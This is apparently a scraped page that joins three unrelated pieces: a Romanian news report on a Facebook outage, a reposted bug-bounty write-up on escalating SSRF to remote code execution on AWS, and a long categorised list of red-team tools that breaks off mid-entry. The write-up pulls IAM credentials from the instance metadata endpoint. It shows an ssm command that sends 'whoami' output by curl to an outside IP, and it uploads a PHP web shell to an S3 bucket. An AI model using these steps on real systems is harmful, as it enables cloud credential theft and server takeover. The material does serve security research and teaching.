Leaderboard

Facebook a picat. Utilizatorii din România, dar și din alte țări, nu pot folosi rețeaua . Facebook a picat. Utilizatorii Facebook din România, dar și din alte țări, reclamă, miercuri, mai multe probleme la funcționarea rețelei de socializare. Utilizatorii Facebook din Europa, dar și din alte regiuni ale lumii, reclamă faptul că nu pot posta sau nu pot răspunde mesajelor primite pe rețeaua de socializare. “Nu pot posta pe Facebook”, “Nu pot să mă loghez pe Facebook” și “Nu pot răspunde la nicio postare”, sunt câteva dintre miile de mesaje postate de utilizatori după ce rețeaua de socializare Facebook a picat. Potrivit unei hărți realizate în baza mesajelor furnizate de utilizatorii care reclamă probleme la funcționarea rețelei Facebook, Facebook a picat în țări din Europa, America de Nord și de Sud, dar și Asia. The Sun notează, miercuri, că sunt probleme și cu cele două aplicații ale Facebook, Instagram și Messenger. Potrivit sursei citate, legat de problemele cu care se confruntă Facebook, de mai bine de o oră, utilizatorii se plâng de un blocaj total (35%), că au probleme cu news-feed-ul (33%) sau că nu se pot loga (30%). Pe Instagram, utlizatorii raportează probleme legate de news feed (56%), de logare (28%), dar și alt gen de probleme (14%). Facebook, cea mai mare retea de socializare online, a mai înregistrat probleme în cursul acestui an. Atunci, problemele au fost înregistrate în Europa, dar și în America și Asia. Source : https://stirileprotv.ro/stiri/ilikeit/facebook-a-picat-utilizatorii-reclama-probleme-in-romania-dar-si-in-alte-tari.html

Escalating SSRF to RCE Home 2019 March 10 Escalating SSRF to RCE March 10, 2019 GeneralEG Hello Pentesters, I’m Youssef A. Mohamed aka GeneralEG Security Researcher @CESPPA , Cyber Security Engineer @Squnity and SRT Member @Synack Today I’m going to share a new juicy vulnerability with you as usual. This issue found in a private client so let’s call it redacted.com Exploring the scope: While enumerating the client’s domain for subdomains. I’ve found subdomain [docs] I came out to this subdomain [docs.redact.com] Finding Out-of-band resource load: The [docs] subdomain was showing some documentations and kind of statistics While clicking on a statistic’s photo I saw kind of weird but not a magical Link: the first thing that came into my mind is to change the ’s value to generaleg0x01.com Then I noticed the [mimeType] parameter so edited the link and changed the values to be like this: https://docs.redact.com/report/api/v2/help/asset?url=https://generaleg0x01.com&mimeType=text/html&t=REDACTED.JWT.TOKEN&advertiserId=11 Until now it just [Out-of-band resource load] Verifying SSRF: While checking the requests/responses in my BurpSuite noticed Response Header [X-Amz-Cf-Id] So, I’ve figured out that they are on AWS Environment. We need to make sure that SSRF is working well here. So as we know [169.254.169.254] is the EC2 instance local IP address. Let’s try to access to the meta-data folder by navigating to [/latest/meta-data/]. SSRF Confirmed. Surfing on the EC2 Environment: Let’s check our current role by navigating to [/latest/meta-data/iam/security-credentials/]. It’s aws-elasticbeanstalk-ec2-role What’s AWS Elastic Beanstalk? AWS Elastic Beanstalk, is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles the deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring. Grabbing the needed data: 1) Go to [/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/] to get [AccessKeyId, SecretAccessKey, Token] 2) Go to [/latest/dynamic/instance-identity/document/] to get [instanceId, accountId, region] Configuring AWS Command Line Interface: Open your terminal: ~# apt install awscli ~# export AWS_ACCESS_KEY_ID=AccessKeyId ~# export AWS_SECRET_ACCESS_KEY=SecretAccessKey ~# export AWS_DEFAULT_REGION=region ~# export AWS_SESSION_TOKEN=Token to get the [UserID] ~# aws sts get-caller-identity SSRF exploited well, Now let’s explore further possibilities to escalate it to something Bigger “RCE”. Escalating SSRF to RCE: I went to try some potential exploitation scenarios. Escalating via [ssm send-command] fail After a few pieces of research tried to use AWS Systems Manager [ssm] command. The role is not authorized to perform this command. I was hoping to escalate it with aws ssm send-command. ~# aws ssm send-command –instance-ids “instanceId” –document-name “AWS-RunShellScript” –comment “whoami” –parameters commands=’curl 128.199.xx.xx:8080/`whoami`’ –output text –region=region An error occurred (AccessDeniedException) when calling the SendCommand operation: User: arn:aws:sts::765xxxxxxxxx:assumed-role/aws-elasticbeanstalk-ec2-role/i-007xxxxxxxxxxxxxx is not authorized to perform: ssm:SendCommand on resource: arn:aws:ec2:us-east-1:765xxxxxxxxx:instance/i-00xxxxxxxxxxxxxx Escalating via [SSH] fail SSH port is closed. I was hoping to escalate it with the famous scenario: “creating a RSA authentication key pair (public key and private key), to be able to log into a remote site from the account, without having to type the password.” Escalating via [Uploading Backdoor] Success Trying to read the [S3 Bucket] content: tried running multiple commands using AWS CLI to retrieve information from the AWS instance. However, access to most of the commands were denied due to the security policy in place. ~# aws s3 ls An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied After a few pieces of research figured that the managed policy “AWSElasticBeanstalkWebTier” only allows accessing S3 buckets whose name start with “elasticbeanstalk”. In order to access the S3 bucket, we will use the data we grabbed earlier with the following format: elasticbeanstalk-region-account-id Now, the bucket name is “elasticbeanstalk-us-east-1-76xxxxxxxx00”. Let’s listed bucket resources for “elasticbeanstalk-us-east-1-76xxxxxxxx00” in a recursive manner to perform this long-running task using AWS CLI: ~# aws s3 ls s3://elasticbeanstalk-us-east-1-76xxxxxxxx00/ –recursive Now, Let’s try to upload a Backdoor! ~# cat cmd.php <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> ~# aws s3 cp cmd.php s3://elasticbeanstalk-us-east-1-76xxxxxxxx00/ upload: ./cmd.php to s3://docs.redact.com/cmd.php And here we got a successful RCE! In a nutshell: You can escalate Server-Side Request Forgery to Remote Code Execute in many ways but it’s depending on your target’s Environment. Happy Hacking! Sursa: https://generaleg0x01.com/2019/03/10/escalating-ssrf-to-rce/

This tool kit is very much influenced by infosecn1nja's kit. Use this script to grab majority of the repos. NOTE: hard coded in /opt and made for Kali Linux Total Size (so far): 2.5G Contents Reconnaissance Weaponization Delivery Command and Control Lateral Movement Establish Foothold Escalate Privileges Data Exfiltration Misc References Reconnaissance Active Intelligence Gathering EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone spoofcheck a program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap dnsrecon a tool DNS Enumeration Script. https://github.com/darkoperator/dnsrecon Passive Intelligence Gathering Social Mapper OSINT Social Media Mapping Tool, takes a list of names & images (or LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. Not restricted by APIs as it instruments a browser using Selenium. Outputs reports to aid in correlating targets across sites. https://github.com/SpiderLabs/social_mapper skiptracer OSINT scraping framework, utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer ScrapedIn a tool to scrape LinkedIn without API restrictions for data reconnaissance. https://github.com/dchrastil/ScrapedIn linkScrape A LinkedIn user/company enumeration tool. https://github.com/NickSanzotta/linkScrape FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans. https://github.com/ElevenPaths/FOCA theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from different public sources. https://github.com/laramies/theHarvester Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt,etc) availables in the target websites. https://github.com/laramies/metagoofil SimplyEmail Email recon made fast and easy, with a framework to build on. https://github.com/killswitch-GUI/SimplyEmail truffleHog searches through git repositories for secrets, digging deep into commit history and branches. https://github.com/dxa4481/truffleHog Just-Metadata is a tool that gathers and analyzes metadata about IP addresses. It attempts to find relationships between systems within a large dataset. https://github.com/ChrisTruncer/Just-Metadata typofinder a finder of domain typos showing country of IP address. https://github.com/nccgroup/typofinder pwnedOrNot is a python script which checks if the email account has been compromised in a data breach, if the email account is compromised it proceeds to find passwords for the compromised account. https://github.com/thewhiteh4t/pwnedOrNot GitHarvester This tool is used for harvesting information from GitHub like google dork. https://github.com/metac0rtex/GitHarvester Frameworks Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. https://www.paterva.com/web7/downloads.php SpiderFoot the open source footprinting and intelligence-gathering tool. https://github.com/smicallef/spiderfoot datasploit is an OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats. https://github.com/DataSploit/datasploit Recon-ng is a full-featured Web Reconnaissance framework written in Python. https://bitbucket.org/LaNMaSteR53/recon-ng Weaponization Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570 Exploit toolkit CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759 CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882 Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878 Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199 demiguise is a HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC Malicious Macro Generator Utility Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism. https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. https://github.com/trustedsec/unicorn Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. https://www.shellterproject.com/ EmbedInHTML Embed and hide any file in an HTML file. https://github.com/Arno0x/EmbedInHTML SigThief Stealing Signatures and Making One Invalid Signature at a Time. https://github.com/secretsquirrel/SigThief Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. https://github.com/Veil-Framework/Veil CheckPlease Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust. https://github.com/Arvanaghi/CheckPlease Invoke-PSImage is a tool to embeded a PowerShell script in the pixels of a PNG file and generates a oneliner to execute. https://github.com/peewpw/Invoke-PSImage LuckyStrike a PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only. https://github.com/curi0usJack/luckystrike ClickOnceGenerator Quick Malicious ClickOnceGenerator for Red Team. The default application a simple WebBrowser widget that point to a website of your choice. https://github.com/Mr-Un1k0d3r/ClickOnceGenerator macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of MS Office documents, VB scripts, and other formats for pentest, demo, and social engineering assessments. https://github.com/sevagas/macro_pack StarFighters a JavaScript and VBScript Based Empire Launcher. https://github.com/Cn33liz/StarFighters nps_payload this script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. https://github.com/trustedsec/nps_payload SocialEngineeringPayloads a collection of social engineering tricks and payloads being used for credential theft and spear phishing attacks. https://github.com/bhdresh/SocialEngineeringPayloads The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. https://github.com/trustedsec/social-engineer-toolkit Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. https://github.com/ryhanson/phishery PowerShdll run PowerShell with rundll32. Bypass software restrictions. https://github.com/p3nt4/PowerShdll Ultimate AppLocker ByPass List The goal of this repository is to document the most common techniques to bypass AppLocker. https://github.com/api0cradle/UltimateAppLockerByPassList Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. https://github.com/sensepost/ruler Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method. https://github.com/enigma0x3/Generate-Macro Malicious Macro MSBuild Generator Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass. https://github.com/infosecn1nja/MaliciousMacroMSBuild Meta Twin is designed as a file resource cloner. Metadata, including digital signature, is extracted from one file and injected into another. https://github.com/threatexpress/metatwin WePWNise generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software. https://github.com/mwrlabs/wePWNise DotNetToJScript a tool to create a JScript file which loads a .NET v2 assembly from memory. https://github.com/tyranid/DotNetToJScript PSAmsi is a tool for auditing and defeating AMSI signatures. https://github.com/cobbr/PSAmsi Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. https://github.com/stephenfewer/ReflectiveDLLInjection ps1encode use to generate and encode a powershell based metasploit payloads. https://github.com/CroweCybersecurity/ps1encode Worse PDF turn a normal PDF file into malicious. Use to steal Net-NTLM Hashes from windows machines. https://github.com/3gstudent/Worse-PDF SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. https://github.com/hlldz/SpookFlare GreatSCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team. https://github.com/GreatSCT/GreatSCT nps running powershell without powershell. https://github.com/Ben0xA/nps Meterpreter_Paranoid_Mode.sh allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to. https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL The Backdoor Factory (BDF) is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state. https://github.com/secretsquirrel/the-backdoor-factory MacroShop a collection of scripts to aid in delivering payloads via Office Macros. https://github.com/khr0x40sh/MacroShop UnmanagedPowerShell Executes PowerShell from an unmanaged process. https://github.com/leechristensen/UnmanagedPowerShell evil-ssdp Spoof SSDP replies to phish for NTLM hashes on a network. Creates a fake UPNP device, tricking users into visiting a malicious phishing page. https://gitlab.com/initstring/evil-ssdp Ebowla Framework for Making Environmental Keyed Payloads. https://github.com/Genetic-Malware/Ebowla make-pdf-embedded a tool to create a PDF document with an embedded file. https://github.com/DidierStevens/DidierStevensSuite/blob/master/make-pdf-embedded.py avet (AntiVirusEvasionTool) is targeting windows machines with executable files using different evasion techniques. https://github.com/govolution/avet Delivery Phishing King Phisher is a tool for testing and promoting user awareness by simulating real world phishing attacks. https://github.com/securestate/king-phisher FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. https://github.com/Raikia/FiercePhish ReelPhish is a Real-Time Two-Factor Phishing Tool. https://github.com/fireeye/ReelPhish/ Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training. https://github.com/gophish/gophish CredSniper is a phishing framework written with the Python micro-framework Flask and Jinja2 templating which supports capturing 2FA tokens. https://github.com/ustayready/CredSniper PwnAuth a web application framework for launching and managing OAuth abuse campaigns. https://github.com/fireeye/PwnAuth Phishing Frenzy Ruby on Rails Phishing Framework. https://github.com/pentestgeek/phishing-frenzy Phishing Pretexts a library of pretexts to use on offensive phishing engagements. https://github.com/L4bF0x/PhishingPretexts *Modlishka is a flexible and powerful reverse proxy, that will take your ethical phishing campaigns to the next level. https://github.com/drk1wi/Modlishka Watering Hole Attack BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. https://github.com/beefproject/beef Command and Control Remote Access Tools Cobalt Strike is software for Adversary Simulations and Red Team Operations. https://cobaltstrike.com/ Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. https://github.com/EmpireProject/Empire Metasploit Framework is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. https://github.com/rapid7/metasploit-framework SILENTTRINITY A post-exploitation agent powered by Python, IronPython, C#/.NET. https://github.com/byt3bl33d3r/SILENTTRINITY Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python. https://github.com/n1nj4sec/pupy Koadic or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. https://github.com/zerosum0x0/koadic PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. https://github.com/nettitude/PoshC2 Gcat a stealthy Python based backdoor that uses Gmail as a command and control server. https://github.com/byt3bl33d3r/gcat TrevorC2 is a legitimate website (browsable) that tunnels client/server communications for covert command execution. https://github.com/trustedsec/trevorc2 Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang. https://github.com/Ne0nd0g/merlin Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you. https://github.com/quasar/QuasarRAT Staging Rapid Attack Infrastructure (RAI) Red Team Infrastructure... Quick... Fast... Simplified One of the most tedious phases of a Red Team Operation is usually the infrastructure setup. This usually entails a teamserver or controller, domains, redirectors, and a Phishing server. https://github.com/obscuritylabs/RAI Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient, disposable, secure and agile infrastructure for Red Teams. https://github.com/byt3bl33d3r/Red-Baron EvilURL generate unicode evil domains for IDN Homograph Attack and detect them. https://github.com/UndeadSec/EvilURL Domain Hunter checks expired domains, bluecoat categorization, and Archive.org history to determine good candidates for phishing and C2 domain names. https://github.com/threatexpress/domainhunter PowerDNS is a simple proof of concept to demonstrate the execution of PowerShell script using DNS only. https://github.com/mdsecactivebreach/PowerDNS Chameleon a tool for evading Proxy categorisation. https://github.com/mdsecactivebreach/Chameleon CatMyFish Search for categorized domain that can be used during red teaming engagement. Perfect to setup whitelisted domain for your Cobalt Strike beacon C&C. https://github.com/Mr-Un1k0d3r/CatMyFish Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. https://github.com/rsmudge/Malleable-C2-Profiles Malleable-C2-Randomizer This script randomizes Cobalt Strike Malleable C2 profiles through the use of a metalanguage, hopefully reducing the chances of flagging signature-based detection controls. https://github.com/bluscreenofjeff/Malleable-C2-Randomizer FindFrontableDomains search for potential frontable domains. https://github.com/rvrsh3ll/FindFrontableDomains Postfix-Server-Setup Setting up a phishing server is a very long and tedious process. It can take hours to setup, and can be compromised in minutes. https://github.com/n0pe-sled/Postfix-Server-Setup DomainFrontingLists a list of Domain Frontable Domains by CDN. https://github.com/vysec/DomainFrontingLists Apache2-Mod-Rewrite-Setup Quickly Implement Mod-Rewrite in your infastructure. https://github.com/n0pe-sled/Apache2-Mod-Rewrite-Setup mod_rewrite rule to evade vendor sandboxes. https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10 external_c2 framework a python framework for usage with Cobalt Strike's External C2. https://github.com/Und3rf10w/external_c2_framework ExternalC2 a library for integrating communication channels with the Cobalt Strike External C2 server. https://github.com/ryhanson/ExternalC2 cs2modrewrite a tools for convert Cobalt Strike profiles to modrewrite scripts. https://github.com/threatexpress/cs2modrewrite e2modrewrite a tools for convert Empire profiles to Apache modrewrite scripts. https://github.com/infosecn1nja/e2modrewrite redi automated script for setting up CobaltStrike redirectors (nginx reverse proxy, letsencrypt). https://github.com/taherio/redi Domain Fronting Google App Engine. https://github.com/redteam-cyberark/Google-Domain-fronting DomainFrontDiscover Scripts and results for finding domain frontable CloudFront domains. https://github.com/peewpw/DomainFrontDiscover Automated Empire Infrastructure https://github.com/bneg/RedTeam-Automation Serving Random Payloads with NGINX. https://gist.github.com/jivoi/a33ace2e25515a31aa2ffbae246d98c9 meek is a blocking-resistant pluggable transport for Tor. It encodes a data stream as a sequence of HTTPS requests and responses. https://github.com/arlolra/meek CobaltStrike-ToolKit Some useful scripts for CobaltStrike. https://github.com/killswitch-GUI/CobaltStrike-ToolKit mkhtaccess_red Auto-generate an HTaccess for payload delivery -- automatically pulls ips/nets/etc from known sandbox companies/sources that have been seen before, and redirects them to a benign payload. https://github.com/violentlydave/mkhtaccess_red RedFile a flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads. https://github.com/outflanknl/RedFile keyserver Easily serve HTTP and DNS keys for proper payload protection. https://github.com/leoloobeek/keyserver DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike (https://www.cobaltstrike.com). https://github.com/SpiderLabs/DoHC2 Lateral Movement CrackMapExec is a swiss army knife for pentesting networks. https://github.com/byt3bl33d3r/CrackMapExec PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. https://github.com/Mr-Un1k0d3r/PowerLessShell GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application. https://github.com/GoFetchAD/GoFetch ANGRYPUPPY a bloodhound attack path automation in CobaltStrike. https://github.com/vysec/ANGRYPUPPY DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques. https://github.com/byt3bl33d3r/DeathStar SharpHound C# Rewrite of the BloodHound Ingestor. https://github.com/BloodHoundAD/SharpHound BloodHound.py is a Python based ingestor for BloodHound, based on Impacket. https://github.com/fox-it/BloodHound.py Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. https://github.com/SpiderLabs/Responder SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally. https://github.com/fireeye/SessionGopher PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. https://github.com/PowerShellMafia/PowerSploit Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. https://github.com/samratashok/nishang Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. https://github.com/Kevin-Robertson/Inveigh PowerUpSQL a PowerShell Toolkit for Attacking SQL Server. https://github.com/NetSPI/PowerUpSQL MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). https://github.com/dafthack/MailSniper WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment. It's designed primarily for use on penetration tests or red team engagements. https://github.com/ChrisTruncer/WMIOps Mimikatz is an open-source utility that enables the viewing of credential information from the Windows lsass. https://github.com/gentilkiwi/mimikatz LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. https://github.com/AlessandroZ/LaZagne mimipenguin a tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. https://github.com/huntergregal/mimipenguin PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. https://docs.microsoft.com/en-us/sysinternals/downloads/psexec KeeThief allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system. https://github.com/HarmJ0y/KeeThief PSAttack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. https://github.com/jaredhaight/PSAttack Internal Monologue Attack Retrieving NTLM Hashes without Touching LSASS. https://github.com/eladshamir/Internal-Monologue Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (for instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself. https://github.com/CoreSecurity/impacket icebreaker gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment. https://github.com/DanMcInerney/icebreaker Living Off The Land Binaries and Scripts (and now also Libraries) The goal of these lists are to document every binary, script and library that can be used for other purposes than they are designed to. https://github.com/api0cradle/LOLBAS WSUSpendu for compromised WSUS server to extend the compromise to clients. https://github.com/AlsidOfficial/WSUSpendu Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. https://github.com/infobyte/evilgrade NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. https://github.com/NytroRST/NetRipper LethalHTA Lateral Movement technique using DCOM and HTA. https://github.com/codewhitesec/LethalHTA Invoke-PowerThIEf an Internet Explorer Post Exploitation library. https://github.com/nettitude/Invoke-PowerThIEf RedSnarf is a pen-testing / red-teaming tool for Windows environments. https://github.com/nccgroup/redsnarf HoneypotBuster Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host. https://github.com/JavelinNetworks/HoneypotBuster Establish Foothold Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. https://github.com/SECFORCE/Tunna reGeorg the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. https://github.com/sensepost/reGeorg Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper. https://github.com/wonderqs/Blade TinyShell Web Shell Framework. https://github.com/threatexpress/tinyshell PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. https://github.com/Sw4mpf0x/PowerLurk DAMP The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification. https://github.com/HarmJ0y/DAMP Escalate Privileges Domain Escalation PowerView is a PowerShell tool to gain network situational awareness on Windows domains. https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 Get-GPPPassword Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured. https://github.com/fox-it/Invoke-ACLPwn BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. https://github.com/BloodHoundAD/BloodHound PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek Grouper a PowerShell script for helping to find vulnerable settings in AD Group Policy. https://github.com/l0ss/Grouper ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis. https://github.com/sense-of-security/ADRecon ADACLScanner one script for ACL's in Active Directory. https://github.com/canix1/ADACLScanner LAPSToolkit a tool to audit and attack LAPS environments. https://github.com/leoloobeek/LAPSToolkit PingCastle is a free, Windows-based utility to audit the risk level of your AD infrastructure and check for vulnerable practices. https://www.pingcastle.com/download RiskySPNs is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). https://github.com/cyberark/RiskySPN Mystique is a PowerShell tool to play with Kerberos S4U extensions, this module can assist blue teams to identify risky Kerberos delegation configurations as well as red teams to impersonate arbitrary users by leveraging KCD with Protocol Transition. https://github.com/machosec/Mystique Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project. https://github.com/GhostPack/Rubeus kekeo is a little toolbox I have started to manipulate Microsoft Kerberos in C (and for fun). https://github.com/gentilkiwi/kekeo Local Escalation UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. https://github.com/hfiref0x/UACME windows-kernel-exploits a collection windows kernel exploit. https://github.com/SecWiki/windows-kernel-exploits PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload. https://github.com/rsmudge/ElevateKit Sherlock a powerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. https://github.com/rasta-mouse/Sherlock Tokenvator a tool to elevate privilege with Windows Tokens. https://github.com/0xbadjuju/Tokenvator Data Exfiltration CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight; Evade DLP/MLS Devices; Social Engineering of Analysts; Defeat Data Whitelisting Controls; Evade AV Detection. https://github.com/TryCatchHCF/Cloakify DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. https://github.com/sensepost/DET DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel. https://github.com/Arno0x/DNSExfiltrator PyExfil a Python Package for Data Exfiltration. https://github.com/ytisf/PyExfil Egress-Assess is a tool used to test egress data detection capabilities. https://github.com/ChrisTruncer/Egress-Assess Powershell RAT python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. https://github.com/Viralmaniar/Powershell-RAT Misc Wireless Networks Wifiphisher is a security tool that performs Wi-Fi automatic association attacks to force wireless clients to unknowingly connect to an attacker-controlled Access Point. https://github.com/wifiphisher/wifiphisher Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies 